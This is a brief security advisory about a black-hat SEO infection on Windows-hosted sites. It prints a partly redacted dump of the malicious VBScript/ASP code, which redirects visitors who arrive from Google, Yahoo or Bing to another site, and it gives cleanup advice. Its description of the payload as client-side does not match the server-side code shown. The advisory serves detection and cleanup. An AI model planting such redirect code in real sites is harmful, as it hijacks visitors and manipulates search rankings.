Redirecting website traffic is another Blackhat SEO malicious technique. BlackHat SEO is used to manipulate the search engine results in order to benefit a website in terms of relevance. The payload is VBScript based, thus intended for client-side use and the payload is executed after the infected page is loaded directly in the browser.
Affecting
Vulnerable sites with VBScript support (hosted on Windows Servers). Outdated software or compromised passwords can act as an infection vector.
Cleanup
Inspect your server looking for any unknown vbs file and remove them. Also, you can sign up with us and let our team remove the malware for you.
Dump
f flag=false then
rUrl = Request.ServerVariables("Http_Referer")
'response.write(rUrl+"rUrl<br/>")
localURL = GetUrl()
'response.write(localURL+"LocationURL<br/>")
if instr(rUrl,"google") or instr(rUrl,"yahoo") or instr(rUrl,"bing") then
key= Request.Querystring("REMOVED")
if instr(localURL,"REMOVED") then
response.redirect("http://www.URL REMOVED .com/")
end if
else
end if
end if